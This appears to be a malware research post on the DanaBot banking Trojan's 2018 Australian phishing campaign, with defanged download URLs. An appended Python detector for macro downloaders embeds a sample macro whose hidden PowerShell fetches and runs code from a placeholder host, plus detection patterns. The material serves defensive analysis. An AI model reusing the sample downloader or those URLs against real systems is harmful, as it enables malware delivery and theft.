

2018 has seen a marked shift away from high-volume, immediately destructive ransomware campaigns to distribution of banking Trojans, information stealers, and downloaders. Banking Trojans now make up almost 60% of the malicious payloads we observe in email. Now a new banking Trojan has emerged, adding to the growing diversity of this segment specifically and of malicious email campaigns in general.

Proofpoint researchers discovered a new banking Trojan, dubbed "DanaBot", targeting users in Australia via emails containing malicious URLs. Written in Delphi, the malware is still under active development. To date, we have only observed it being spread by a single threat actor. However, it remains to be seen whether distribution and use become more widespread, given that this actor is known for purchasing banking Trojans from other developers and operators. We also found additional samples in malware repositories beyond those we observed in the wild, potentially suggesting distribution by other actors.

We first observed DanaBot as the payload of an Australia-targeted email campaign on May 6, 2018.

Figure 1: Sample email from a May 6, 2018, DanaBot campaign

The messages used the subject "Your E-Toll account statement" and contained URLs redirecting to Microsoft Word documents hosted on another site (hxxp://userstpgcomau/angelcorp2001/Account+Statement_Mon752018.doc). The Word document contained a macro that, if enabled, downloaded DanaBot using a PowerShell command from hxxp://bbclumpensorg/tXBDQjBLvs.php. This payload was only served to potential victims in Australia, with the server checking the client's IP geolocation before responding.
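The macro-to-PowerShell downloader chain described above is a common pattern worth triaging statically before detonation. The following is an added example, not Proofpoint's code or anything recovered from the DanaBot document: a small Python check that takes VBA macro source already extracted from a document (for instance with olevba) and looks for the combination of an auto-executing procedure, a shell or PowerShell launch, PowerShell evasion flags, a download primitive and an embedded URL. The macro text, the `hxxp://bad.example/p.php` URL and the scoring thresholds are all constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Constructed VBA macro modelled on the behaviour the post describes
# (auto-open macro launching PowerShell to fetch a second stage). It is a
# hypothetical sample, not the DanaBot document, and uses a placeholder URL.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim c As String
    c = "power" & "shell -nop -w hidden -c " & _
        """IEX (New-Object Net.WebClient).DownloadString('hxxp://bad.example/p.php')"""
    CreateObject("WScr" & "ipt.Shell").Run c, 0
End Sub
'''

# Constructed benign macro for contrast.
BENIGN_MACRO = r'''
Sub FormatTable()
    Selection.Font.Bold = True
End Sub
'''

AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open|Auto_Open)\b", re.I)
SHELL_EXEC = re.compile(r"(WScript\.Shell|\bShell\s*\(|CreateObject\s*\()", re.I)
POWERSHELL = re.compile(r"powershell(\.exe)?|\bpwsh\b", re.I)
PS_EVASION = re.compile(
    r"-(nop|noprofile|w(indowstyle)?\s+hidden|e(nc|ncodedcommand)?\b|ep\s+bypass|exec(utionpolicy)?\s+bypass)",
    re.I,
)
DOWNLOAD = re.compile(
    r"(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Invoke-Expression|\bIEX\b|BitsTransfer|Msxml2\.XMLHTTP)",
    re.I,
)
URL = re.compile(r"""\bh(?:xx|tt)ps?://[^\s"')]+""", re.I)


def normalize(vba: str) -> str:
    """Undo two cheap obfuscations before matching: VBA line continuations
    ("_" at end of line) and split string literals ("pow" & "ershell")."""
    text = re.sub(r"\s+_\s*\r?\n\s*", " ", vba)
    text = re.sub(r'"\s*&\s*"', "", text)
    return text


@dataclass
class Triage:
    auto_exec: list = field(default_factory=list)
    shell_exec: list = field(default_factory=list)
    powershell: bool = False
    ps_evasion: list = field(default_factory=list)
    download: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def score(self) -> int:
        # One point per indicator family present (hypothetical weighting).
        return sum([bool(self.auto_exec), bool(self.shell_exec), self.powershell,
                    bool(self.ps_evasion), bool(self.download), bool(self.urls)])

    @property
    def verdict(self) -> str:
        # The downloader chain needs all three legs: something that runs on
        # open, something that executes a command, and something that fetches.
        if self.auto_exec and (self.shell_exec or self.powershell) and (self.download or self.urls):
            return "likely-downloader"
        if self.score >= 2:
            return "suspicious"
        return "benign-looking"


def triage_macro(vba: str) -> Triage:
    """Run every indicator regex over the normalized macro text."""
    text = normalize(vba)
    t = Triage()
    t.auto_exec = sorted({m.group(0) for m in AUTO_EXEC.finditer(text)})
    t.shell_exec = sorted({m.group(0).strip() for m in SHELL_EXEC.finditer(text)})
    t.powershell = bool(POWERSHELL.search(text))
    t.ps_evasion = sorted({m.group(0) for m in PS_EVASION.finditer(text)})
    t.download = sorted({m.group(0) for m in DOWNLOAD.finditer(text)})
    t.urls = sorted(set(URL.findall(text)))
    return t


if __name__ == "__main__":
    for name, macro in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        result = triage_macro(macro)
        print(name, result.verdict, result.score, result.urls, result.ps_evasion)
```

The URL that the check extracts is the thing to pivot on, but keep the geofencing in mind when reproducing the download: because the server described above only answers clients whose IP geolocates to Australia, fetching the second stage from a sandbox elsewhere will usually return nothing, which is itself a useful signal that the infrastructure is still live and selective rather than dead.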
